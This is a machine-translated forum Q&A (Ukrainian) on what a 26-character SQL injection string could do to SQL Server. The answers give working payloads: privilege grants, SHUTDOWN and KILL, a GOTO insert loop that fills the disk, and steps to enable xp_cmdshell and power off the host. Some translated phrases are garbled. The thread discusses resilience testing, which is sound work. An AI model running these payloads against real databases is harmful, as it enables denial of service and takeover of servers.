Впорскування SQL Server - скільки шкоди за 26 символів?

Я тестую на стійкість до ін'єкційних атак на базу даних SQL Server.

Усі назви таблиць у db мають малі регістри , а зіставлення залежить від регістру, Latin1_General_CS_AS .

Рядок, який я можу надсилати, примусовий до великої літери, і може мати максимум 26 символів. Тому я не можу надсилати таблицю DROP, оскільки ім'я таблиці буде великим, і, таким чином, операція не працює через зіставлення.

Отже - який максимальний збиток я міг завдати 26 символам?

EDIT

Я знаю все про параметризовані запити тощо - давайте уявимо, що особа, яка розробила передню частину, яка будує запит для надсилання, не використовувала парами в цьому випадку.

Я також не намагаюся робити щось гнусне, це система, побудована кимось ще в одній організації.

Легко:

GRANT EXECUTE TO LowlyDBA

Або, мабуть, у цьому випадку це було б

grant execute to lowlydba 

Виберіть свій варіант.

Ймовірно, ви зможете протестувати це на теперішній системі, але будь-яка кількість невеликих змін у базі даних з часом може визнати недійсним тестування. Рядок символів може змінитися, хтось може створити процедуру, що зберігається з малих регістрів, яка має деструктивний потенціал - будь-що. Ніколи не можна зі 100% впевненістю сказати, що не існує руйнівного нападу 26 символів, який хтось міг би побудувати.

Я пропоную вам знайти спосіб змусити розробника дотримуватися основних стандартів галузевих стандартів найкращої безпеки, хоча б заради себе, як хтось, кого я вважаю, щонайменше частково відповідальний у випадку порушення безпеки.

Редагувати:

А для зловмисності / забави ви можете спробувати включити кожен прапор слідів. Це було б цікаво спостерігати. Схоже, повідомлення в блозі зробив Брент Озар ...

DBCC TRACEON(xxxx, -1)

SHUTDOWNКоманда або KILLкоманда (вибрати випадкове число більше 50) і прийняти значно менше , ніж 26 символів, хоча рахунок виконання запитів додатків , сподіваюся , не має достатніх дозволів для запуску їх.

Ви можете створити таблицю, яку потім заповнюєте, до кінця часу або місця на диску не закінчиться, залежно від того, що відбудеться раніше.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

Залежно від вашого визначення шкоди, ви можете запустити це: ЗАСТОСУВАННЯ ВАЙТФОР '23: 59' Щоб бути справді злим, ви можете скористатися інструментом тестування навантаження, щоб запустити це від 32 768 клієнтів.

Варіація на основі відповіді @ MikaelEriksson та @ відповіді MartinSmith на мій початковий коментар:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Спочатку я намагався зробити заяву WHILE, але найкраще, що я міг зробити, це 27 символів:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

Але Мартін вказав GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO ... корінь усякого зла і творець нескінченного контуру вставки з 26 символів.

З урахуванням сказаного ... може бути вигідніше дотримуватися CHAR (99) замість int, оскільки це використовує більше місця. Інші параметри або використовують більш довгі імена, і зменшують обмеження на 26 символів ... або використовують менше місця для зберігання в рядку.

Повний код тесту:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

Залежно від того, якою шкодою ви вважаєте вимкнення живлення. :-)

Для цього потрібно включити xp_cmdshell на сервері, що не стосується останніх версій SQL Server. Він також вимагає, щоб обліковий запис служби мав право відключення, яке воно може мати, а може і не мати.

Увімкнення xp_cmdshell, ймовірно, виходить за межі вашого 26 символів. Чи дозволили б ви зробити кілька ін'єкцій?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE